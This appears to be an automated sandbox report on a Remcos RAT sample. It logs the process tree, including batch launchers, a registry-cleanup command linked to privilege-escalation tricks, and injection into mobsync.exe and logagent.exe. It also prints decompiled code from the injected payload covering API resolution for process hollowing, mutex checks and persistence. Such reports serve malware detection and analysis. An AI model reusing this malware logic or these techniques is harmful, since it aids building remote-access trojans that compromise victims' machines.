Start time:	22:02:39
Start date:	22/09/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6284 Parent PID: 6272

General

Start time:	22:02:40
Start date:	22/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6332 Parent PID: 6272

General

Start time:	22:02:41
Start date:	22/09/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6360 Parent PID: 6332

General

Start time:	22:02:42
Start date:	22/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: Kkjczlm.exe PID: 6396 Parent PID: 3472

General

Start time:	22:02:42
Start date:	22/09/2021
Path:	C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe'
Imagebase:	0x400000
File size:	1017856 bytes
MD5 hash:	1A1A9B3969ABCD2FCCD2C6CE20BE68AC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 27%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 6408 Parent PID: 3192

General

Start time:	22:02:42
Start date:	22/09/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6440 Parent PID: 6408

General

Start time:	22:02:43
Start date:	22/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: reg.exe PID: 6508 Parent PID: 6408

General

Start time:	22:02:43
Start date:	22/09/2021
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg delete hkcu\Environment /v windir /f
Imagebase:	0xac0000
File size:	59392 bytes
MD5 hash:	CEE2A7E57DF2A159A065A34913A055C2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6520 Parent PID: 6508

General

Start time:	22:02:44
Start date:	22/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Kkjczlm.exe PID: 6604 Parent PID: 3472

General

Start time:	22:02:50
Start date:	22/09/2021
Path:	C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\Libraries\Kkjczlm\Kkjczlm.exe'
Imagebase:	0x400000
File size:	1017856 bytes
MD5 hash:	1A1A9B3969ABCD2FCCD2C6CE20BE68AC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi

Chronological Activities

Analysis Process: mobsync.exe PID: 6232 Parent PID: 6396

General

Start time:	22:03:18
Start date:	22/09/2021
Path:	C:\Windows\SysWOW64\mobsync.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\mobsync.exe
Imagebase:	0xb50000
File size:	93184 bytes
MD5 hash:	44C19378FA529DD88674BAF647EBDC3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Author: Joe Security Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.417356547.0000000002D18000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001C.00000002.417466186.0000000010590000.00000040.00000001.sdmp, Author: Joe Security Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001C.00000002.417466186.0000000010590000.00000040.00000001.sdmp, Author: unknown

Chronological Activities

Analysis Process: logagent.exe PID: 6200 Parent PID: 6604

General

Start time:	22:03:27
Start date:	22/09/2021
Path:	C:\Windows\SysWOW64\logagent.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\logagent.exe
Imagebase:	0xe40000
File size:	86016 bytes
MD5 hash:	E2036AC444AB4AD91EECC1A80FF7212F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000020.00000002.436279698.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000020.00000002.436279698.0000000000400000.00000040.00000001.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000020.00000002.437204734.0000000003297000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000020.00000002.437522537.0000000010590000.00000040.00000001.sdmp, Author: Joe Security Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000020.00000002.437522537.0000000010590000.00000040.00000001.sdmp, Author: unknown

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: ZfigYV6HXd.exe PID: 3192 Parent PID: 4512 ZfigYV6HXd.exeCOMMON

Executed Functions

Non-executed Functions

Function 032F4D2C, Relevance: 5.1, Strings: 4, Instructions: 129COMMON

Download Yara Rule

Strings

p.@, xrefs: 032F4EAB
p.@, xrefs: 032F4D85
3C, xrefs: 032F4E79
l.@, xrefs: 032F4E63

Memory Dump Source

Source File: 00000001.00000003.272327382.00000000032F4000.00000004.00000001.sdmp, Offset: 032F4000, based on PE: false

Similarity

API ID:
String ID: l.@$p.@$p.@$3C
API String ID: 0-542283486
Opcode ID: c8a749997cf1c26def18ea4b0fc89dc5befe63049a7e31b985774c4fe61c331a
Instruction ID: 125b0982d3aaaf484d858b6d10e26b0829a473ec50c17be4bca8e5260f302a1c
Opcode Fuzzy Hash: c8a749997cf1c26def18ea4b0fc89dc5befe63049a7e31b985774c4fe61c331a
Instruction Fuzzy Hash: 2A415D34530701AEE731FE26C908B23F5E9AB00758F248A3ED3A69A6D4D7F599C48784

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: logagent.exe PID: 6224 Parent PID: 3192 logagent.exeCOMMON

Executed Functions

Function 0040CD09, Relevance: 84.1, APIs: 28, Strings: 20, Instructions: 98
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CD09() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;
				_Unknown_base(*)()* _t24;

				_t1 = LoadLibraryA("Psapi.dll"); // executed
				_t2 = GetProcAddress(_t1, "GetModuleFileNameExA");
				 *0x46bd2c = _t2;
				if(_t2 == 0) {
					 *0x46bd2c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
				}
				 *0x46bd1c = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
				if( *0x46bd2c == 0) {
					 *0x46bd1c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
				}
				 *0x46bd24 = GetProcAddress(LoadLibraryA("ntdll.dll"), "NtUnmapViewOfSection");
				 *0x46bd10 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
				 *0x46beac = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				 *0x46beb0 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
				 *0x46bd20 = GetProcAddress(LoadLibraryA("Shell32"), "IsUserAnAdmin");
				 *0x46bd14 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
				 *0x46bd30 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
				 *0x46bd34 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
				 *0x46bd18 = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
				_t24 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
				 *0x46bb04 = _t24;
				return _t24;
			}

0x0040cd1c
0x0040cd25
0x0040cd2d
0x0040cd34
0x0040cd45
0x0040cd45
0x0040cd60
0x0040cd65
0x0040cd76
0x0040cd76
0x0040cd94
0x0040cda8
0x0040cdbc
0x0040cdd0
0x0040cde4
0x0040cdf8
0x0040ce0c
0x0040ce20
0x0040ce31
0x0040ce39
0x0040ce3d
0x0040ce43

APIs

LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,00000000,Octopus-GM39UT,00000001,0040C505), ref: 0040CD1C
GetProcAddress.KERNEL32(00000000), ref: 0040CD25
GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA), ref: 0040CD40
GetProcAddress.KERNEL32(00000000), ref: 0040CD43
LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW), ref: 0040CD54
GetProcAddress.KERNEL32(00000000), ref: 0040CD57
GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW), ref: 0040CD71
GetProcAddress.KERNEL32(00000000), ref: 0040CD74
LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 0040CD85
GetProcAddress.KERNEL32(00000000), ref: 0040CD88
LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 0040CD99
GetProcAddress.KERNEL32(00000000), ref: 0040CD9C
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040CDAD
GetProcAddress.KERNEL32(00000000), ref: 0040CDB0
GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW), ref: 0040CDC1
GetProcAddress.KERNEL32(00000000), ref: 0040CDC4
LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin), ref: 0040CDD5
GetProcAddress.KERNEL32(00000000), ref: 0040CDD8
GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy), ref: 0040CDE9
GetProcAddress.KERNEL32(00000000), ref: 0040CDEC
GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW), ref: 0040CDFD
GetProcAddress.KERNEL32(00000000), ref: 0040CE00
GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors), ref: 0040CE11
GetProcAddress.KERNEL32(00000000), ref: 0040CE14
GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW), ref: 0040CE25
GetProcAddress.KERNEL32(00000000), ref: 0040CE28
LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C), ref: 0040CE36
GetProcAddress.KERNEL32(00000000), ref: 0040CE39

Strings

EnumDisplayMonitors, xrefs: 0040CE02
GetMonitorInfoW, xrefs: 0040CE16
EnumDisplayDevicesW, xrefs: 0040CDEE
ntdll.dll, xrefs: 0040CD80
Shell32, xrefs: 0040CDCB
Shlwapi.dll, xrefs: 0040CE2C
user32, xrefs: 0040CDF3, 0040CE07, 0040CE1B
GlobalMemoryStatusEx, xrefs: 0040CD8A
kernel32.dll, xrefs: 0040CD8F
GetModuleFileNameExW, xrefs: 0040CD4A, 0040CD67
GetModuleFileNameExA, xrefs: 0040CD12, 0040CD36
SetProcessDEPPolicy, xrefs: 0040CDDA
Psapi.dll, xrefs: 0040CD17, 0040CD4F
IsUserAnAdmin, xrefs: 0040CDC6
kernel32, xrefs: 0040CDA3, 0040CDB7, 0040CDDF
NtUnmapViewOfSection, xrefs: 0040CD7B
Octopus-GM39UT, xrefs: 0040CD10
Kernel32.dll, xrefs: 0040CD3B, 0040CD6C
GetComputerNameExW, xrefs: 0040CDB2
IsWow64Process, xrefs: 0040CD9E

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$HandleModule$LibraryLoad
String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Octopus-GM39UT$Psapi.dll$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$user32
API String ID: 551388010-1666371535
Opcode ID: 9e74a4b7297bf2b2a58517a95ccdf4e1be594d5622eed8d1bc547594be329630
Instruction ID: 7f0a72ef543637f7c74f83f283374f20c8e911501c3ee670a040c0af445c8e1c
Opcode Fuzzy Hash: 9e74a4b7297bf2b2a58517a95ccdf4e1be594d5622eed8d1bc547594be329630
Instruction Fuzzy Hash: 1F21AEA0E8135875D620BBB29C49E1B2E58DA44B95B204927F205D7191FFFCC540CEEF

Uniqueness

Uniqueness Score: -1.00%

Function 0040D0B5, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00410885: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004108A5
Part of subcall function 00410885: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,0046C518), ref: 004108C3
Part of subcall function 00410885: RegCloseKey.KERNELBASE(?), ref: 004108CE

Sleep.KERNELBASE(00000BB8), ref: 0040D169
ExitProcess.KERNEL32 ref: 0040D1DE

Strings

override, xrefs: 0040D0D4
3.2.1 Pro, xrefs: 0040D144, 0040D1B7
pth_unenc, xrefs: 0040D10E, 0040D181

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseExitOpenProcessQuerySleepValue
String ID: 3.2.1 Pro$override$pth_unenc
API String ID: 2281282204-2083519672
Opcode ID: e8eef23d0450733ddffb4ed0590df9d184fd0f0211c19a2a612e1f43d34f4dff
Instruction ID: 08f4d26337d929cf8c522b5db6824f2b5f74010f43e1cc258f687c08e2209bf0
Opcode Fuzzy Hash: e8eef23d0450733ddffb4ed0590df9d184fd0f0211c19a2a612e1f43d34f4dff
Instruction Fuzzy Hash: 45212731F443012BD608B6B68C57B6F32969B80708F10042FB8066B2D2FEBDDA45879F

Uniqueness

Uniqueness Score: -1.00%

Function 0042E5CA, Relevance: 4.5, APIs: 3, Instructions: 33encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00000000,00000001,?,0042E381,00000024,?,00000000,?), ref: 0042E5DF
CryptGenRandom.ADVAPI32(00000000,00000000,?,?,0042E381,00000024,?,00000000,?,?,?,?,?,?,?,00428BA3), ref: 0042E5F4
CryptReleaseContext.ADVAPI32(00000000,00000000,?,0042E381,00000024,?,00000000,?,?,?,?,?,?,?,00428BA3,?), ref: 0042E606

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: be640132c4cc09921de464d7efa084b83adc683f71156fedcc3855f66cb2cb71
Instruction ID: 38117f8ee5779777ede6d5b7ba3ea51b7ecd80fb833ca9539c352c605c5c0cae
Opcode Fuzzy Hash: be640132c4cc09921de464d7efa084b83adc683f71156fedcc3855f66cb2cb71
Instruction Fuzzy Hash: 46F06D31318324BBEB310F56FC19F573E99EB81BA6FA00536F209E50E4E6628940865C

Uniqueness

Uniqueness Score: -1.00%

Function 00416D9E, Relevance: 3.0, APIs: 2, Instructions: 41COMMON

Download Yara Rule

APIs

GetComputerNameExW.KERNEL32(00000001,?,00000028,0046C578), ref: 00416DBB
GetUserNameW.ADVAPI32(?,00000037), ref: 00416DD3

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Name$ComputerUser
String ID:
API String ID: 4229901323-0
Opcode ID: be6cad12c344e77614ab7161f93b502ddfc4643f3128554765fcc8d2a5d5d92a
Instruction ID: 97ef4402937901d3963fe518a4296ad78cd3b90a883e9fb2300271c61e114a9f
Opcode Fuzzy Hash: be6cad12c344e77614ab7161f93b502ddfc4643f3128554765fcc8d2a5d5d92a
Instruction Fuzzy Hash: 38014F7190011CABCB00EB90DC45EDDB7BCEF44305F10016AF905B2196EEB46A898B98

Uniqueness

Uniqueness Score: -1.00%

Function 00422251, Relevance: 1.5, APIs: 1, Instructions: 10networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 0042225C

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 770d8840f0cfa992c73ee2df09c2a5214786fe1339814540061c585bff84fad7
Instruction ID: e48ef5bedcc115dfdcbe715373a672fa69d6f329cf61ba9e4e3f48fb4f6a798c
Opcode Fuzzy Hash: 770d8840f0cfa992c73ee2df09c2a5214786fe1339814540061c585bff84fad7
Instruction Fuzzy Hash: 9DC02B3900420CBFCF011FA0CD0CCBD3FADD7443517008024F90102251C533C62097A4

Uniqueness

Uniqueness Score: -1.00%

Function 0042F8B9, Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_0002F8C5,0042F5A8), ref: 0042F8BE

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: e558ee6a599fcacb4150c7bdc9a2a2691efb109ccac4c0442e4bfa04ac03d4bd
Instruction ID: 86e206407557d0ac1bda88e2f45e42cbf33a4e9732861bd4a6740e282559d687
Opcode Fuzzy Hash: e558ee6a599fcacb4150c7bdc9a2a2691efb109ccac4c0442e4bfa04ac03d4bd
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0040C2BE, Relevance: 63.8, APIs: 16, Strings: 20, Instructions: 774
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040C2BE(void* __edx, void* __eflags, intOrPtr _a4, char* _a12) {
				char _v524;
				char _v700;
				char _v720;
				char _v724;
				char _v728;
				char _v744;
				char _v756;
				char _v760;
				char _v772;
				struct _SECURITY_ATTRIBUTES* _v776;
				signed int _v780;
				char _v784;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t71;
				void* _t78;
				void** _t86;
				void* _t90;
				CHAR* _t93;
				long _t95;
				int _t97;
				char _t100;
				void* _t101;
				void* _t105;
				void* _t121;
				void* _t122;
				void* _t129;
				char _t135;
				char* _t137;
				signed char* _t139;
				signed char* _t141;
				void* _t144;
				void* _t146;
				void* _t160;
				void* _t163;
				intOrPtr _t165;
				void* _t166;
				intOrPtr _t182;
				intOrPtr* _t185;
				void* _t187;
				void* _t193;
				char* _t196;
				void* _t199;
				char* _t203;
				void* _t210;
				signed short* _t214;
				void* _t215;
				void* _t216;
				signed int _t217;
				CHAR* _t224;
				void* _t226;
				char* _t229;
				char* _t231;
				intOrPtr* _t233;
				void* _t235;
				intOrPtr* _t240;
				intOrPtr* _t244;
				void* _t246;
				void* _t254;
				void* _t265;
				void* _t268;
				struct _SECURITY_ATTRIBUTES* _t269;
				int _t272;
				char* _t360;
				signed int _t382;
				signed int _t386;
				int _t388;
				signed int _t394;
				signed int _t397;
				intOrPtr _t423;
				void* _t433;
				void* _t435;
				signed int _t452;
				void* _t455;
				char* _t461;
				void* _t462;
				char* _t465;
				void* _t467;
				void* _t472;
				char* _t477;
				intOrPtr* _t481;
				void* _t484;
				void* _t485;
				void* _t486;
				signed int _t492;
				void* _t495;
				void* _t496;
				void* _t497;
				void* _t499;
				void* _t501;
				void* _t502;
				void* _t506;

				_t444 = __edx;
				 *0x46bd28 = _a4;
				_push(_t268);
				E0040CC55( &_v724, __edx, __eflags); // executed
				_t495 = (_t492 & 0xfffffff8) - 0x2f4;
				E004020EC(_t268, _t495, __edx, __eflags, 0x46c59c);
				_t496 = _t495 - 0x18;
				E004020EC(_t268, _t496, __edx, __eflags,  &_v728);
				_t71 = E00417478( &_v756, __edx); // executed
				_t497 = _t496 + 0x30;
				E0040D458(__edx, _t71);
				L00401E74( &_v760, __edx);
				_t284 = _a12;
				if( *_a12 != 0x2d) {
					L6:
					_t461 = 0x46c578;
					__eflags =  *((char*)(L00401F95(L00401E49(0x46c578, _t444, __eflags, 3))));
					 *0x46bb01 = __eflags != 0;
					_t78 = E00405343(_t268,  &_v756, E004075E6( &_v780, "Software\\", __eflags, L00401E49(0x46c578, _t444, __eflags, 0xe)), 0x46c578, __eflags, "\\");
					_t471 = 0x46c518;
					L00401FD1(0x46c518, _t77, 0x46c518, _t78);
					L00401FC7();
					L00401FC7();
					E00405A0B(_t268, 0x46c5cc, "Exe");
					_t269 = 0;
					L00401E49(0x46c578, _t77, __eflags, 0x32);
					__eflags =  *(E00405220(0));
					 *0x46bd4e = __eflags != 0;
					L00401E49(0x46c578, _t77, __eflags, 0x33);
					_t86 = E00405220(0);
					__eflags =  *_t86;
					 *0x46bd4f =  *_t86 != 0;
					__eflags =  *0x46bd4e - _t269; // 0x0
					if(__eflags == 0) {
						L8:
						_v776 = _t269;
						_t472 = OpenMutexA(0x100000, _t269, "Remcos_Mutex_Inj");
						__eflags = _t472;
						if(_t472 != 0) {
							WaitForSingleObject(_t472, 0xea60);
							CloseHandle(_t472);
						}
						_t447 = L00401F95(0x46c518); // executed
						_t90 = E00410885(_t89, "Inj",  &_v776); // executed
						__eflags = _t90;
						if(__eflags != 0) {
							_t447 = L00401F95(0x46c518);
							L00410CE2(_t259, __eflags, "Inj");
						}
						L00401FAD(0x46c548, L00401E49(_t461, _t447, __eflags, 0xe));
						_t93 = L00401F95(0x46c548);
						_t462 = 0;
						_t272 = 1;
						CreateMutexA(0, 1, _t93); // executed
						_t95 = GetLastError();
						__eflags = _t95 - 0xb7;
						if(_t95 == 0xb7) {
							L45:
							L00401FC7();
							_t97 = _t272;
							goto L5;
						} else {
							E0040CD09();
							GetModuleFileNameW(0, "C:\Windows\SysWOW64\logagent.exe", 0x104);
							_t100 = E00417614(0x46c548);
							_push(0x46c548);
							_t448 = 0x80000002;
							 *0x46beb4 = _t100;
							_t101 = E004108E2( &_v772, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName"); // executed
							_t499 = _t497 + 0xc;
							L00401FD1(0x46c5b4, 0x80000002, 0x46c5b4, _t101);
							L00401FC7();
							__eflags =  *0x46beb4;
							if( *0x46beb4 == 0) {
								_push(" (32 bit)");
							} else {
								_push(" (64 bit)");
							}
							E00405A02(_t272, 0x46c5b4, _t462);
							_t105 =  *0x46bd20;
							__eflags = _t105;
							if(_t105 != 0) {
								 *0x46a9d0 =  *_t105();
							}
							_t477 = 0x46c578;
							__eflags = _v776 - _t462;
							if(__eflags == 0) {
								_t433 = L00401E49(0x46c578, _t448, __eflags, 0x2e);
								__eflags =  *((char*)(L00401F95(_t433)));
								if(__eflags != 0) {
									__eflags =  *0x46bd20 - _t462; // 0x7614e630
									if(__eflags != 0) {
										__eflags =  *0x46a9d0 - _t462; // 0x1
										if(__eflags == 0) {
											_t448 = L00401F95(0x46c518);
											_t254 = E0041083B(0x46c518, _t253, "origmsc");
											_pop(_t435);
											__eflags = _t254;
											if(__eflags == 0) {
												L00405F77(_t272, _t435, _t448);
											}
										} else {
											_push(_t433);
											_push(_t433);
											__eflags = E0040A713() - 0xffffffff;
											if(__eflags == 0) {
												E00406071(__eflags);
											}
										}
									}
								}
							}
							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 0x27))));
							if(__eflags != 0) {
								E0040D3F7();
							}
							L00409DC9(_t272, 0x46c4e8, L00401F95(L00401E49(_t477, _t448, __eflags, 0xb)));
							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 4))));
							 *0x46bb02 = __eflags != 0;
							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 5))));
							 *0x46bafb = __eflags != 0;
							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 8))));
							 *0x46bb00 = __eflags != 0;
							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 3))));
							if(__eflags != 0) {
								_t240 = L00401F95(L00401E49(_t477, _t448, __eflags, 0x30));
								_t25 = _t240 + 2; // 0x2
								_t448 = _t25;
								do {
									_t423 =  *_t240;
									_t240 = _t240 + 2;
									__eflags = _t423 - _t462;
								} while (_t423 != _t462);
								__eflags = _t240 - _t448;
								if(__eflags != 0) {
									_t244 = L00401F95(L00401E49(_t477, _t448, __eflags, 9));
									_t246 = L00401F95(L00401E49(0x46c578, _t448, __eflags, 0x30));
									_t448 =  *_t244;
									L00401EFA(0x46c530,  *_t244, _t244, E0041805B( &_v780,  *_t244, _t246));
									L00401EF0();
									_t477 = 0x46c578;
								}
							}
							__eflags = _v776 - _t462;
							if(_v776 != _t462) {
								L00431F00(_t462,  &_v524, _t462, 0x208);
								_t121 = E00402489();
								_t122 = L00401F95(0x46c560);
								_t449 = L00401F95(0x46c518);
								E00410A30(_t124, "exepath",  &_v524, 0x208, _t122, _t121);
								_t501 = _t499 + 0x20;
								L00409DC9(_t272, 0x46c500,  &_v524);
								_t465 = 0x46c578;
								goto L47;
							} else {
								__eflags =  *0x46bb01;
								if(__eflags == 0) {
									L00409DC9(_t272, 0x46c500, "C:\Windows\SysWOW64\logagent.exe");
								} else {
									_t229 = L00401F95(L00401E49(_t477, _t448, __eflags, 0x1e));
									_t231 = L00401F95(L00401E49(_t477, _t448, __eflags, 0xc));
									_t233 = L00401F95(L00401E49(0x46c578, _t448, __eflags, 9));
									__eflags =  *_t229;
									__eflags =  *_t231;
									_t477 = 0x46c578;
									_t235 = L00401F95(L00401E49(0x46c578, _t448,  *_t231, 0xa));
									E0040A987( *_t233, L00401F95(L00401E49(0x46c578, _t448, __eflags, 0x30)), _t235, ((_t232 & 0xffffff00 |  *_t229 != 0x00000000) & 0 | __eflags != 0x00000000) & 0x000000ff, (_t232 & 0xffffff00 |  *_t229 != 0x00000000) & 0x000000ff);
									_t499 = _t499 + 0xc;
									_t272 = 1;
									_t462 = 0;
								}
								_t210 = E00402489();
								_t452 = 2;
								_t394 =  ~(0 | __eflags > 0x00000000) | (_t210 + 0x00000001) * _t452;
								_push(_t394);
								_v780 = _t394;
								_t486 = E0042F4C6(_t394, (_t210 + 1) * _t452 >> 0x20, _t477, __eflags);
								__eflags = _t486;
								if(_t486 == 0) {
									_t486 = _t462;
								} else {
									L00431F00(_t462, _t486, _t462, _v780);
									_t499 = _t499 + 0xc;
								}
								_t214 = L00401EEB(0x46c500);
								_t455 = _t486 - _t214;
								__eflags = _t455;
								_t467 = 2;
								do {
									_t397 =  *_t214 & 0x0000ffff;
									 *(_t214 + _t455) = _t397;
									_t214 = _t214 + _t467;
									__eflags = _t397;
